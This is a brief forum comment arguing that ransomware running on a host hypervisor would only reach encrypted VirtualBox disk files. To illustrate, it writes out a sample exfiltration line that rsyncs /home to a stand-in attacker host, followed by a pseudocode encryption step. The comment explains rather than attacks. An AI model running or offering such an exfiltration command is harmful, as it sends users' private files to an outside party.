|
|
|
|
|
|
by theevilsharpie
1347 days ago
|
|
|
Ransomware typically does the rough equivalent of: rsync -az /home baddie@remote-files.example.com:/your-files/
encrypt-all-files /home
If such a thing were to run on the host hypervisor, it would be reading an encrypted virtual disk file, not its unencrypted contents (since it would be encrypted at rest on the host).I suppose it would be possible for the ransomware to be aware of Virtualbox and somehow manipulate Virtualbox's management plane to get access to unencrypted disk data, but unless you're the victim of a targeted ransomware attack, that's pretty unlikely. |
|
|